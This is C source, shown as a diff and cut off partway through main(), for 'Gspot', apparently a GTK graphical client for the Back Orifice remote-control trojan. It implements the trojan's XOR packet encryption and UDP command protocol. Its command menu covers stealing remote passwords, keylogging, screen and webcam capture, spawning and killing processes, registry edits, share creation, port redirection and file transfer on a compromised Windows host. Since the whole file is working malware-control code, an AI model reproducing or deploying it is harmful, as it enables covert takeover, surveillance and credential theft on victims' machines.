+#include "config.h"
+#include "bounix.h"
+#include "helpstrings.h"
+#include <gtk/gtk.h>
+
+// Do you have anything to declare?
+#define PROBE_STR_MAX 30
+
+typedef struct {
+ gchar *Name[1]; //Odd? Yes, but gotta do it for Clist
+ gchar command[PROBE_STR_MAX + 1];
+ gchar firstArg[PROBE_STR_MAX + 1];
+ gchar secondArg[PROBE_STR_MAX + 1];
+} probeListItem;
+
+// Function prototypes
+void insertProbe (gchar *Name, gchar *bocommand, gchar *arg1, gchar *arg2);
+void initializeProbes (void);
+void destroy (GtkWidget *widget, gpointer data);
+void update_value(GtkWidget *widget, gpointer data);
+void select_probe (GtkWidget *widget, gint row, gint column, GdkEventButton *event, gpointer data);
+void gtk_puts (gchar *message);
+void givehelpcommand(char *arg1);
+void helpDialog (GtkWidget *widget, gpointer data);
+gint main( int argc, char *argv[] );
+
+// Globals
+gchar currentProbe[PROBE_STR_MAX + 1];
+gchar responce[BUFFSIZE + 1];
+gchar oldhost[ARGSIZE + 1];
+gchar oldport[6];
+gint pidx = 0;
+probeListItem *probeArray;
+GtkWidget *returnScreen;
+GtkWidget *rsScroll;
+GtkWidget *hostText, *portText, *arg1Text, *arg2Text, *passText;
+GtkWidget *arg1Label, *arg2Label;
+// From bounix.c
+int udpsock;
+int port = PORT;
+int g_lastpongport;
+unsigned long host;
+unsigned long g_lastpongip;
+unsigned long g_packet;
+static long holdrand = 1L;
+struct sockaddr_in sockaddr;
+struct in_addr hostin;
+char g_password[ARGSIZE + 1];
+char g_lastdata[BUFFSIZE + 1];
+char cwd[MAX_PATH + 1];
+char buff[BUFFSIZE + 1];
+
+
+
+// Look! Actual code!
+
+void msrand (unsigned int seed )
+{
+ holdrand = (long)seed;
+}
+
+int mrand ( void)
+{
+ return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
+}
+
+unsigned int getkey()
+{
+ int x, y;
+ unsigned int z;
+
+ y = strlen(g_password);
+ if (!y)
+ return 31337;
+ else {
+ z = 0;
+ for (x = 0; x < y; x++)
+ z+= g_password[x];
+
+ for (x = 0; x < y; x++)
+ {
+ if (x%2)
+ z-= g_password[x] * (y-x+1);
+ else
+ z+= g_password[x] * (y-x+1);
+ z = z%RAND_MAX;
+ }
+ z = (z * y)%RAND_MAX;
+ return z;
+ }
+}
+
+void BOcrypt(unsigned char *buff, int len)
+{
+ int y;
+
+ if (!len)
+ return;
+
+ msrand(getkey());
+ for (y = 0; y < len; y++)
+ buff[y] = buff[y] ^ (mrand()%256);
+}
+
+/*
+ * I/O socket functions
+ */
+
+int getpong(int sock) /* loops through with select, returns 0 on correct ping response */
+{ /* and 1 on a timeout or select error. */
+ struct sockaddr_in host;
+ char buff[BUFFSIZE];
+ int hostsize, x, sel;
+ unsigned long *pdw;
+ unsigned char *ptr;
+ unsigned long packetsize;
+ unsigned char type;
+ fd_set fds;
+ struct timeval tv;
+
+ FD_ZERO(&fds);
+ FD_SET(sock, &fds);
+ tv.tv_sec = 0;
+ tv.tv_usec = 0;
+ hostsize = sizeof(host);
+
+ while ( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0)
+ {
+ tv.tv_sec=0;
+ tv.tv_usec=0;
+
+ if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host, &hostsize)) <= 0 ) {
+ return(1);
+ }
+
+ BOcrypt(buff, x);
+
+ if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0)
+ {
+ sprintf(responce, "------- Garbage packet recieved from %s port %d -------\n",
+ inet_ntoa(host.sin_addr),
+ (int)ntohs(host.sin_port) );
+ gtk_puts(responce);
+ continue;
+ }
+ pdw = (unsigned long *)buff;
+ pdw+=2;
+ packetsize = __EL_LONG(*pdw);
+ pdw+=2;
+ ptr = (unsigned char *)pdw;
+ type = *ptr++;
+
+ if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) &&
+ (type == TYPE_PING))
+ {
+ sprintf(responce, "---- Pong received from %s port %d ---\n",
+ inet_ntoa(host.sin_addr),
+ (int)ntohs(host.sin_port) );
+ gtk_puts(responce);
+ gtk_puts(ptr);
+ sprintf(responce, "---------- End of data ----------------------\n");
+ gtk_puts(responce);
+ g_lastpongip = host.sin_addr.s_addr;
+ g_lastpongport = (int)ntohs(host.sin_port);
+ return(0);
+ } else {
+ sprintf(responce, "---- Non pong response from %s port %d ---\n",
+ inet_ntoa(host.sin_addr),
+ (int)ntohs(host.sin_port) );
+ gtk_puts(responce);
+ gtk_puts(ptr);
+ sprintf(responce, "---------- End of data ---------------------\n");
+ gtk_puts(responce);
+ continue;
+ }
+ }
+ if (sel < 0)
+ perror("select");
+
+ return(1);
+}
+
+int getinput(int sock)
+{
+ struct sockaddr_in host;
+ char buff[BUFFSIZE];
+ int hostsize, x, sel;
+ unsigned long *pdw;
+ unsigned char *ptr;
+ unsigned long packetsize;
+ unsigned long oldestpack, lastpacket, packetid, p;
+ unsigned char type;
+ struct timeval tv;
+ fd_set fds;
+
+ FD_ZERO(&fds);
+ FD_SET(sock, &fds);
+ tv.tv_sec = 10;
+ tv.tv_usec = 0;
+ hostsize = sizeof(host);
+
+ while( (sel = select(sock+1, &fds, NULL, NULL, &tv)) > 0 )
+ {
+ tv.tv_sec = 10; /* check, does select modify tv? */
+ tv.tv_usec = 0;
+
+ if ( (x = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&host,
+ &hostsize)) <= 0)
+ continue; /* this still shouldnt happen */
+
+ BOcrypt(buff, x);
+ if ( strncmp(buff, MAGICSTRING, MAGICSTRINGLEN) != 0)
+ continue; /* this packet isnt for us, pass off */
+
+ pdw = (unsigned long *)buff; /* parse out the packet */
+ pdw+=2;
+ packetsize = *pdw++;
+ packetsize = __EL_LONG(packetsize);
+ packetid = *pdw++;
+ packetid = __EL_LONG(packetid);
+ ptr = (unsigned char *)pdw;
+ type = *ptr++;
+
+ /* this is a singular packet */
+ if (!(type & PARTIAL_PACKET) && !(type & CONTINUED_PACKET ) )
+ {
+ sprintf(responce, "---- Packet received from %s port %d -----\n",
+ inet_ntoa(host.sin_addr),
+ (int)ntohs(host.sin_port) );
+ gtk_puts(responce);
+ gtk_puts(ptr);
+ sprintf(responce, "---------- End of data ---------------------\n");
+ gtk_puts(responce);
+ return 0; /* success */
+ }
+
+ /* first packet in a set of packets */
+ if (!(type & CONTINUED_PACKET))
+ {
+ oldestpack = packetid;
+ sprintf(responce, "---- Packet received from %s port %d -----\n",
+ inet_ntoa(host.sin_addr),
+ (int)ntohs(host.sin_port) );
+ gtk_puts(responce);
+ }
+
+ if(type & CONTINUED_PACKET) /* if we're here, i believe this will always be true */
+ {
+ /* if packetid = lastpacket+1 (normal), this doesnt run */
+
+ /* This code is B00l Shit. It's borken big time.
+ for(p=lastpacket; packetid > lastpacket+1; p++)
+ printf("Packet #%d in this collection is MIA\n", (int)(p-oldestpack));
+ */
+ lastpacket = packetid;
+ }
+
+ gtk_puts(ptr);
+
+ /* last packet in a set of packets */
+ if (!(type & PARTIAL_PACKET))
+ {
+ sprintf(responce, "---------- End of data ---------------------\n");
+ gtk_puts(responce);
+ return 0; /* success */
+ }
+ }
+
+ /* determine why we broke out of the loop */
+ if (sel == 0) {
+ sprintf(responce, "Timeout on wait, host may not be reachable, or no server installed\n");
+ gtk_puts(responce);
+ }
+ else if (sel < 0)
+ perror("select");
+
+ return(1); /* error */
+}
+
+
+int sendping(unsigned long dest, int port, int sock)
+{
+ unsigned char *ptr;
+ unsigned long *pdw;
+ unsigned long size;
+ struct sockaddr_in host;
+ char buff[BUFFSIZE];
+ int i;
+ fd_set fdset;
+ struct timeval tv;
+
+ size = MAGICSTRINGLEN + (sizeof(unsigned long)*2) + 2;
+ strcpy(buff, MAGICSTRING);
+ pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
+ *pdw++ = __EL_LONG(size);
+ *pdw++ = __EL_LONG((unsigned long)-1);
+ ptr = (unsigned char *)pdw;
+ *ptr++ = TYPE_PING;
+ *ptr = 0;
+
+ BOcrypt(buff, (int)size);
+
+ host.sin_family = AF_INET;
+ host.sin_port = htons((u_short)port);
+ host.sin_addr.s_addr = dest;
+
+ FD_ZERO(&fdset);
+ FD_SET(sock, &fdset);
+ tv.tv_sec = 10;
+ tv.tv_usec = 0;
+
+ i = select(sock+1, NULL, &fdset, NULL, &tv);
+ if (i == 0)
+ {
+ sprintf(responce, "Timeout waiting to send to socket\n");
+ gtk_puts(responce);
+ return(1);
+ } else if (i < 0) {
+ perror("select: ");
+ return(1);
+ }
+
+ if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size )
+ {
+ perror("sendto: ");
+ return(1);
+ }
+
+ return 0;
+}
+
+int sendpacket(unsigned char type, const char *str1, const char *str2, unsigned long dest, int port, int sock)
+{
+ unsigned char *ptr;
+ unsigned long *pdw;
+ unsigned long size;
+ struct sockaddr_in host;
+ char buff[BUFFSIZE];
+
+ if (dest == 0)
+ {
+ gtk_puts("Set a target host with the 'host' command. (Type 'help' for assistance)");
+ return 1;
+ }
+ /* 4 4 1 ? ? 1
+ * -----------------------------------------------
+ * |MAGICSTRING|size|pakt|t|arg1... |arg2... |crc|
+ * | | |num | | | | |
+ * -----------------------------------------------
+ */
+ size = MAGICSTRINGLEN + (sizeof(long)*2) + 3 + strlen(str1) + strlen(str2);
+ strcpy(buff, MAGICSTRING);
+ pdw = (unsigned long *)(buff + MAGICSTRINGLEN);
+ *pdw++ = __EL_LONG(size);
+ *pdw++ = __EL_LONG(g_packet);
+ g_packet++;
+ ptr = (unsigned char *)pdw;
+ *ptr++ = type;
+ strcpy(ptr, str1);
+ ptr += strlen(str1) + 1;
+ strcpy(ptr, str2);
+
+ BOcrypt(buff, (int)size);
+
+ host.sin_family = AF_INET;
+ host.sin_port = htons((u_short)port);
+ host.sin_addr.s_addr = dest;
+
+ if ( (sendto(sock, buff, size, 0, (struct sockaddr *)&host, sizeof(host))) != size)
+ {
+ perror("sendto: ");
+ return(1);
+ }
+ return 0;
+}
+
+
+/************************** MISC FUNCTIONS **************************/
+
+void fixfilename(char *buff, const char *cwd, const char *path)
+{
+ if (path[0] == '\\')
+ {
+ strncpy(buff, cwd, 2);
+ strncpy(buff+3, path, strlen(path)+1);
+ } else if (strncmp(path+1, ":\\", 2) == 0){
+ strcpy(buff, path);
+ } else {
+ sprintf(buff, "%s%s", cwd, path);
+ }
+}
+
+void execute(GtkWidget *widget, gpointer data)
+{
+ if ( host == 0 || // We don't have a host? Must be the first time...
+ (strcmp(oldhost, gtk_entry_get_text(GTK_ENTRY(hostText))) ||
+ strcmp(oldport, gtk_entry_get_text(GTK_ENTRY(portText))) ) ) // The hostname or port was changed
+ {
+ executecommand("HOST", gtk_entry_get_text(GTK_ENTRY(hostText)),
+ gtk_entry_get_text(GTK_ENTRY(portText)));
+ if ( host == 0 )
+ {
+ gtk_puts("Resolver said: \"Eat me\"\n I think you should check your hostname/port.");
+ gtk_entry_set_text(GTK_ENTRY(hostText), oldhost);
+ gtk_entry_set_text(GTK_ENTRY(portText), oldport);
+ return;
+ }
+ //We've a host now.
+ strcpy(oldhost, gtk_entry_get_text(GTK_ENTRY(hostText)) );
+ strcpy(oldport, gtk_entry_get_text(GTK_ENTRY(portText)) );
+ }
+ if (currentProbe[0] == 0)
+ {
+ gtk_puts("Please click on one of the commands.\n I know it looks like ping is selected, but it isn't.");
+ }
+ if (executecommand(currentProbe,
+ gtk_entry_get_text(GTK_ENTRY(arg1Text)),
+ gtk_entry_get_text(GTK_ENTRY(arg2Text)) ))
+ {
+ sprintf(responce, "Command Failed\n");
+ gtk_puts(responce);
+ }
+}
+
+
+
+
+//-----------------------------------------------
+// GKT code below
+//-----------------------------------------------
+
+
+
+void insertProbe (gchar *Name, gchar *bocommand, gchar *arg1, gchar *arg2)
+{
+ if (!probeArray)
+ {
+ probeArray = malloc(sizeof(probeListItem));
+ }
+ else
+ {
+ probeArray = realloc(probeArray, (sizeof(probeListItem) * (pidx+1)) );
+ }
+ probeArray[pidx].Name[0] = malloc(sizeof(gchar) * strlen(Name) + 1);
+ strcpy(probeArray[pidx].Name[0], Name);
+ strcpy(probeArray[pidx].command, bocommand);
+ strcpy(probeArray[pidx].firstArg, arg1);
+ strcpy(probeArray[pidx].secondArg, arg2);
+ pidx++;
+
+}
+
+void initializeProbes (void)
+{
+ // I've taken a few out, they aren't neccessary with a GUI
+ // insertProbe("HOST", "", "");
+ // insertProbe("QUIT", "", "");
+ // insertProbe("PASSWD", "", "");
+ // BO commands
+ insertProbe("Ping", "PING", "Unused:", "Unused:");
+ insertProbe("Ping List", "PINGLIST", "File Name:", "Unused:");
+ insertProbe("Sweep subnet", "SWEEP", "Subnet:", "Unused:");
+ insertProbe("Sweep List", "SWEEPLIST", "File Name:", "Unused:");
+ // File operations
+ insertProbe("List dir", "DIR", "File pattern:", "Unused:");
+ insertProbe("Find file", "FIND", "File pattern:", "Start in:");
+ insertProbe("View file", "VIEW", "File name:", "Unused:");
+ insertProbe("Delete file", "DEL", "File:", "Unused:");
+ insertProbe("Copy file", "COPY", "Source filename:", "Destination:");
+ insertProbe("Rename file", "REN", "File name:", "Destination:");
+ insertProbe("Compress file", "FREEZE", "Freeze file:", "Destination:");
+ insertProbe("Uncompress file", "MELT", "Frozen file:", "Destination:");
+ // Dir operations
+ insertProbe("Change dir", "CD", "New directory:", "Unused:");
+ insertProbe("Make directory", "MD", "New dir:", "Unused:");
+ insertProbe("Remove directory", "RD", "Directory:", "Unused:");
+ // insertProbe("Download file", "GET", "Remote filename:", "Local filename:"); Apparently these two
+ // insertProbe("Upload file", "PUT", "Local filename:", "Remote filename:"); weren't implemented
+ // System operations
+ // insertProbe("Open Shell", "SHELL", "Unused:", "Unused:"); Also not implemented
+ // insertProbe("Get status", "STATUS", "Unused:", "Unused:"); Status is useless to me
+ insertProbe("Get system info", "INFO", "Unused:", "Unused:");
+ insertProbe("Get remote passwords", "PASSES", "Unused:", "Unused:");
+ insertProbe("Create system dialog", "DIALOG", "Dialog text:", "Title text:");
+ insertProbe("Keylog", "KEYLOG", "Log File: (or stop)", "Unused:");
+ insertProbe("List processes", "PROCLIST", "Unused:", "Unused:");
+ insertProbe("Kill process", "PROCKILL", "Process ID:", "Unused:");
+ insertProbe("Start process", "PROCSPAWN", "Commandline:", "Unused:");
+ insertProbe("Lockup system", "LOCKUP", "Unused:", "Unused:");
+ insertProbe("Reboot system", "REBOOT", "Unused:", "Unused:");
+ // Network stuff
+ insertProbe("Resolve hostname", "RESOLVE", "Hostname:", "Unused:");
+ insertProbe("List IP redirects", "REDIRLIST", "Unused:", "Unused:");
+ insertProbe("Delete IP redirect", "REDIRDEL", "Redir Number:", "Unused:");
+ insertProbe("Add IP redirect", "REDIRADD", "Input Port:", "Output IP:Port,UDP:");
+ insertProbe("List console apps", "APPLIST", "Unused:", "Unused:");
+ insertProbe("Remove console app", "APPDEL", "App ID:", "Unused:");
+ insertProbe("Add console app", "APPADD", "Program:", "Port:");
+ insertProbe("List available resources", "NETVIEW", "Unused:", "Unused:");
+ insertProbe("List connected resources", "NETLIST", "Unused:", "Unused:");
+ insertProbe("Disconnect resource", "NETDISCONNECT", "Resource:", "Unused:");
+ insertProbe("Connect to resource", "NETCONNECT", "Resource:", "Password:");
+ insertProbe("List shares", "SHARELIST", "Unused:", "Unused:");
+ insertProbe("Delete shares", "SHAREDEL", "Share name:", "Unused:");
+ insertProbe("Add shares", "SHAREADD", "Share name:", "Local dir,Password,remark:");
+ insertProbe("Stop HTTP server", "HTTPOFF", "Unused:", "Unused:");
+ insertProbe("Start HTTP server", "HTTPON", "Port:", "Root:");
+ insertProbe("Send file via TCP", "TCPSEND", "File name:", "Target IP:Port");
+ insertProbe("Recieve file via TCP", "TCPRECV", "File name:", "Target IP:Port");
+ // Multimedia stuff
+ insertProbe("List MM capture devices", "LISTCAPS", "Unused:", "Unused:");
+ insertProbe("Capture bitmap", "CAPSCREEN", "File name:", "Unused:");
+ insertProbe("Capture frame from MM", "CAPFRAME", "File name:", "Device,Width,Height,Bits:");
+ insertProbe("Capture AVI", "CAPAVI", "File name:", "Seconds,Device,Width,Height,Bits:");
+ insertProbe("Play wav file", "SOUND", "File name;", "Unused:");
+ // Registry
+ insertProbe("List registry subkeys", "REGLISTKEYS", "Keyname:", "Unused:");
+ insertProbe("List registry values", "REGLISTVALS", "Keyname:", "Unused:");
+ insertProbe("Delete registry key", "REGDELKEY", "Keyname:", "Unused:");
+ insertProbe("Make registry key", "REGMAKEKEY", "Keyname:", "Unused:");
+ insertProbe("Delete registry value", "REGDELVAL", "Value name:", "Unused:");
+ insertProbe("Set registry value", "REGSETVAL", "Value name:", "Type,Value:");
+ // Plugins
+ insertProbe("List plugins", "PLUGINLIST", "Unused:", "Unused:");
+ insertProbe("Stop plugin", "PLUGINKILL", "Plugin ID:", "Unused:");
+ insertProbe("Execute plugin", "PLUGINEXEC", "DLL name:Plugin name:", "Plugin args");
+
+ probeArray = realloc(probeArray, sizeof(probeListItem) * (pidx+1) );
+}
+
+void destroy (GtkWidget *widget, gpointer data)
+{
+ if(probeArray) {
+ pidx = 0;
+ while ( probeArray[pidx].Name[0] != NULL ) {
+ free(probeArray[pidx].Name[0]);
+ pidx++;
+ }
+ free(probeArray);
+ probeArray = NULL;
+ }
+ close(udpsock);
+ gtk_main_quit ();
+}
+
+
+void update_value(GtkWidget *widget, gpointer data)
+{
+ // Right now, passText is the only widget that calls us.
+ //if ( strcasecmp("passText", gtk_widget_get_name( GTK_WIDGET(widget) )) == 0 )
+ strcpy(g_password, gtk_entry_get_text(GTK_ENTRY(widget)));
+}
+
+
+void select_probe (GtkWidget *widget, gint row, gint column, GdkEventButton *event, gpointer data)
+{
+ strcpy(currentProbe, probeArray[row].command);
+ gtk_label_set(GTK_LABEL(arg1Label), probeArray[row].firstArg);
+ gtk_label_set(GTK_LABEL(arg2Label), probeArray[row].secondArg);
+}
+
+void gtk_puts (gchar *message)
+{
+ gtk_text_insert( GTK_TEXT(returnScreen),NULL,NULL,NULL,message,-1);
+ if(message[strlen(message)-1] != '\n')
+ gtk_text_insert( GTK_TEXT(returnScreen),NULL,NULL,NULL,"\n",-1);
+}
+
+void givehelpcommand(char *arg1)
+{
+ helpDialog(NULL, arg1);
+}
+
+void helpDialog (GtkWidget *widget, gpointer data)
+{
+ GtkWidget *helpWindow;
+ GtkWidget *button;
+ GtkWidget *label;
+ char labelTemp[10];
+
+ helpWindow = gtk_dialog_new ();
+ gtk_container_border_width (GTK_CONTAINER (helpWindow), 10);
+
+ button = gtk_button_new_with_label("OK");
+ gtk_signal_connect_object (GTK_OBJECT (button), "clicked",
+ GTK_SIGNAL_FUNC (gtk_widget_destroy), GTK_OBJECT (helpWindow));
+ gtk_box_pack_start (GTK_BOX (GTK_DIALOG (helpWindow)->action_area), button,
+ TRUE, TRUE, 0);
+ gtk_widget_show (button);
+
+ if (strlen((char *) data) == 0) label = gtk_label_new("Select an item first");
+ else if (strcasecmp((char *) data, "HOST") == 0) label = gtk_label_new(hosthelp);
+ else if (strcasecmp((char *) data, "QUIT") == 0) label = gtk_label_new(quithelp);
+ else if (strcasecmp((char *) data, "PING") == 0) label = gtk_label_new(pinghelp);
+ else if (strcasecmp((char *) data, "PINGLIST") == 0) label = gtk_label_new(pinglisthelp);
+ else if (strcasecmp((char *) data, "SWEEP") == 0) label = gtk_label_new(sweephelp);
+ else if (strcasecmp((char *) data, "SWEEPLIST") == 0) label = gtk_label_new(sweeplisthelp);
+ else if (strcasecmp((char *) data, "SHELL") == 0) label = gtk_label_new(shellhelp);
+ else if (strcasecmp((char *) data, "STATUS") == 0) label = gtk_label_new(statushelp);
+ else if (strcasecmp((char *) data, "PASSWD") == 0) label = gtk_label_new(passwdhelp);
+ else if (strcasecmp((char *) data, "DIR") == 0) label = gtk_label_new(dirhelp);
+ else if (strcasecmp((char *) data, "CD") == 0) label = gtk_label_new(cdhelp);
+ else if (strcasecmp((char *) data, "DEL") == 0) label = gtk_label_new(delhelp);
+ else if (strcasecmp((char *) data, "GET") == 0) label = gtk_label_new(gethelp);
+ else if (strcasecmp((char *) data, "PUT") == 0) label = gtk_label_new(puthelp);
+ else if (strcasecmp((char *) data, "COPY") == 0) label = gtk_label_new(copyhelp);
+ else if (strcasecmp((char *) data, "FIND") == 0) label = gtk_label_new(findhelp);
+ else if (strcasecmp((char *) data, "FREEZE") == 0) label = gtk_label_new(freezehelp);
+ else if (strcasecmp((char *) data, "MELT") == 0) label = gtk_label_new(melthelp);
+ else if (strcasecmp((char *) data, "VIEW") == 0) label = gtk_label_new(viewhelp);
+ else if (strcasecmp((char *) data, "REN") == 0) label = gtk_label_new(renhelp);
+ else if (strcasecmp((char *) data, "MD") == 0) label = gtk_label_new(mdhelp);
+ else if (strcasecmp((char *) data, "RD") == 0) label = gtk_label_new(rdhelp);
+ else if (strcasecmp((char *) data, "INFO") == 0) label = gtk_label_new(infohelp);
+ else if (strcasecmp((char *) data, "PASSES") == 0) label = gtk_label_new(passeshelp);
+ else if (strcasecmp((char *) data, "DIALOG") == 0) label = gtk_label_new(dialoghelp);
+ else if (strcasecmp((char *) data, "KEYLOG") == 0) label = gtk_label_new(keyloghelp);
+ else if (strcasecmp((char *) data, "REBOOT") == 0) label = gtk_label_new(reboothelp);
+ else if (strcasecmp((char *) data, "NETVIEW") == 0) label = gtk_label_new(netviewhelp);
+ else if (strcasecmp((char *) data, "NETCONNECT") == 0) label = gtk_label_new(netconnecthelp);
+ else if (strcasecmp((char *) data, "NETDISCONNECT") == 0) label = gtk_label_new(netdisconnecthelp);
+ else if (strcasecmp((char *) data, "NETLIST") == 0) label = gtk_label_new(netlisthelp);
+ else if (strcasecmp((char *) data, "RESOLVE") == 0) label = gtk_label_new(resolvehelp);
+ else if (strcasecmp((char *) data, "SHARELIST") == 0) label = gtk_label_new(sharelisthelp);
+ else if (strcasecmp((char *) data, "SHAREADD") == 0) label = gtk_label_new(shareaddhelp);
+ else if (strcasecmp((char *) data, "SHAREDEL") == 0) label = gtk_label_new(sharedelhelp);
+ else if (strcasecmp((char *) data, "PROCLIST") == 0) label = gtk_label_new(proclisthelp);
+ else if (strcasecmp((char *) data, "PROCKILL") == 0) label = gtk_label_new(prockillhelp);
+ else if (strcasecmp((char *) data, "PROCSPAWN") == 0) label = gtk_label_new(procspawnhelp);
+ else if (strcasecmp((char *) data, "LISTCAPS") == 0) label = gtk_label_new(listcapshelp);
+ else if (strcasecmp((char *) data, "CAPSCREEN") == 0) label = gtk_label_new(capscreenhelp);
+ else if (strcasecmp((char *) data, "CAPFRAME") == 0) label = gtk_label_new(capframehelp);
+ else if (strcasecmp((char *) data, "CAPAVI") == 0) label = gtk_label_new(capavihelp);
+ else if (strcasecmp((char *) data, "SOUND") == 0) label = gtk_label_new(soundhelp);
+ else if (strcasecmp((char *) data, "REDIRLIST") == 0) label = gtk_label_new(redirlisthelp);
+ else if (strcasecmp((char *) data, "REDIRDEL") == 0) label = gtk_label_new(redirdelhelp);
+ else if (strcasecmp((char *) data, "REDIRADD") == 0) label = gtk_label_new(rediraddhelp);
+ else if (strcasecmp((char *) data, "APPADD") == 0) label = gtk_label_new(appaddhelp);
+ else if (strcasecmp((char *) data, "APPDEL") == 0) label = gtk_label_new(appdelhelp);
+ else if (strcasecmp((char *) data, "APPLIST") == 0) label = gtk_label_new(applisthelp);
+ else if (strcasecmp((char *) data, "REGMAKEKEY") == 0) label = gtk_label_new(regmakekeyhelp);
+ else if (strcasecmp((char *) data, "REGDELKEY") == 0) label = gtk_label_new(regdelkeyhelp);
+ else if (strcasecmp((char *) data, "REGLISTKEYS") == 0) label = gtk_label_new(reglistkeyshelp);
+ else if (strcasecmp((char *) data, "REGLISTVALS") == 0) label = gtk_label_new(reglistvalshelp);
+ else if (strcasecmp((char *) data, "REGDELVAL") == 0) label = gtk_label_new(regdelvalhelp);
+ else if (strcasecmp((char *) data, "REGSETVAL") == 0) label = gtk_label_new(regsetvalhelp);
+ else if (strcasecmp((char *) data, "HTTPON") == 0) label = gtk_label_new(httponhelp);
+ else if (strcasecmp((char *) data, "HTTPOFF") == 0) label = gtk_label_new(httpoffhelp);
+ else if (strcasecmp((char *) data, "TCPSEND") == 0) label = gtk_label_new(tcpsendhelp);
+ else if (strcasecmp((char *) data, "TCPRECV") == 0) label = gtk_label_new(tcprecvhelp);
+ else if (strcasecmp((char *) data, "LOCKUP") == 0) label = gtk_label_new(lockuphelp);
+ else if (strcasecmp((char *) data, "PLUGINEXEC") == 0) label = gtk_label_new(pluginexechelp);
+ else if (strcasecmp((char *) data, "PLUGINKILL") == 0) label = gtk_label_new(pluginkillhelp);
+ else if (strcasecmp((char *) data, "PLUGINLIST") == 0) label = gtk_label_new(pluginlisthelp);
+ else {
+ snprintf ( labelTemp, 10, "No help for '%s'\n", (char *) data);
+ label = gtk_label_new(labelTemp);
+ }
+
+ gtk_box_pack_start (GTK_BOX (GTK_DIALOG (helpWindow)->vbox), label, TRUE,
+ TRUE, 0);
+ gtk_widget_show (label);
+ gtk_widget_show (helpWindow);
+
+}
+
+int main( int argc, char *argv[] )
+{
+ int clientport = 0;
+ struct linger linger;
+ int bufsize;
+ GtkWidget *window;
+ GtkWidget *kitchenTable;
+ GtkWidget *hbox, *vbox;
+#if GTK_MINOR_VERSION >= 2
+ GtkWidget *probeScroll;
+#endif
+ GtkWidget *probeList;
+ GtkWidget *helpBUTTon, *exeBUTTon;
+ GtkWidget *hostLabel, *portLabel, *passLabel;
+ // As a reminder, the following components are global:
+ /*
+ GtkWidget *returnScreen;
+ GtkWidget *rsScroll;
+ GtkWidget *hostText, *portText, *arg1Text, *arg2Text, *passText;
+ GtkWidget *arg1Label, *arg2Label;
+ */
+
+ gtk_init (&argc, &argv);
+ initializeProbes();
+
+ // Initialize the UDP port
+ host = 0;
+ g_packet = 0;
+ g_password[0] = 0;
+ strcpy(cwd, "c:\\");
+ if ( (udpsock = socket(PF_INET, SOCK_DGRAM, 0)) < 0)
+ {
+ perror("socket: ");
+ return(1);
+ }
+ memset(&sockaddr, 0, sizeof(sockaddr));
+ sockaddr.sin_family = AF_INET;
+ sockaddr.sin_port = htons((u_short)clientport);
+ if ( (bind(udpsock, (struct sockaddr *)&sockaddr, sizeof(sockaddr))) < 0)
+ {
+ perror("bind: ");
+ return(1);
+ }
+ linger.l_onoff = 0; // dont linger
+ setsockopt(udpsock, SOL_SOCKET, SO_LINGER, (void *)&linger, sizeof(linger) );
+
+
+
+ // Create the window
+ window = gtk_window_new (GTK_WINDOW_TOPLEVEL);
+ gtk_window_set_title (GTK_WINDOW (window), "Gspot");
+ gtk_container_border_width (GTK_CONTAINER (window), 5);
+ gtk_widget_set_usize (GTK_WIDGET (window), 500, 400);
+ gtk_signal_connect (GTK_OBJECT (window), "delete_event",
+ GTK_SIGNAL_FUNC (destroy), NULL);
+ gtk_signal_connect (GTK_OBJECT (window), "destroy",
+ GTK_SIGNAL_FUNC (destroy), NULL);
+
+ // Create the table container
+ kitchenTable = gtk_table_new(4, 3, FALSE);
+ gtk_table_set_row_spacings( GTK_TABLE(kitchenTable), 2 );
+ gtk_table_set_col_spacings( GTK_TABLE(kitchenTable), 2 );
+ gtk_container_add (GTK_CONTAINER (window), kitchenTable);
+ gtk_widget_show(kitchenTable);
+
+ // Use a CList item with one column for the commands
+ probeList = gtk_clist_new(1);
+ gtk_clist_set_selection_mode( GTK_CLIST(probeList), GTK_SELECTION_BROWSE );
+#if GTK_MINOR_VERSION >= 1
+ probeScroll = gtk_scrolled_window_new( NULL, NULL );
+ gtk_scrolled_window_set_policy( GTK_SCROLLED_WINDOW (probeScroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC);
+ gtk_clist_set_shadow_type( GTK_CLIST(probeList), GTK_SHADOW_ETCHED_IN);
+#else
+ gtk_clist_set_border(GTK_CLIST(probeList), GTK_SHADOW_ETCHED_IN);
+ gtk_clist_set_policy(GTK_CLIST(probeList), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC );
+#endif
+ gtk_clist_column_titles_passive(GTK_CLIST(probeList));
+ gtk_clist_set_column_title(GTK_CLIST(probeList), 0, "Commands" );
+ gtk_clist_column_titles_show(GTK_CLIST(probeList));
+ gtk_clist_set_column_width(GTK_CLIST(probeList), 175, 0 );
+ gtk_widget_set_usize (GTK_WIDGET (probeList), 175, 0);
+ pidx = 0;
+ while(probeArray[pidx].Name[0] != NULL) {
+ gtk_clist_append( (GtkCList*) probeList, probeArray[pidx].Name);
+ pidx++;
+ }
+ gtk_signal_connect (GTK_OBJECT(probeList), "select_row",
+ GTK_SIGNAL_FUNC(select_probe), NULL);
+#if GTK_MINOR_VERSION >= 1
+ gtk_table_attach( GTK_TABLE(kitchenTable), probeScroll, 0, 1, 0, 3,
+ GTK_FILL, GTK_FILL | GTK_EXPAND, 0, 0);
+ gtk_scrolled_window_add_with_viewport( GTK_SCROLLED_WINDOW (probeScroll), GTK_WIDGET (probeList) );
+ gtk_widget_set_usize (GTK_WIDGET (probeScroll), 175, 0);
+ gtk_widget_show(probeScroll);
+#else
+ gtk_table_attach( GTK_TABLE(kitchenTable), probeList, 0, 1, 0, 3,
+ GTK_FILL, GTK_FILL | GTK_EXPAND, 0, 0);
+#endif
+ gtk_widget_show(probeList);
+
+ // Help and Exe buttons
+ hbox = gtk_hbox_new(TRUE, 2);
+ gtk_table_attach( GTK_TABLE(kitchenTable), hbox, 0, 1, 3, 4,
+ GTK_FILL | GTK_SHRINK, GTK_SHRINK, 3, 3);
+ gtk_widget_show (hbox);
+ helpBUTTon = gtk_button_new_with_label("Help");
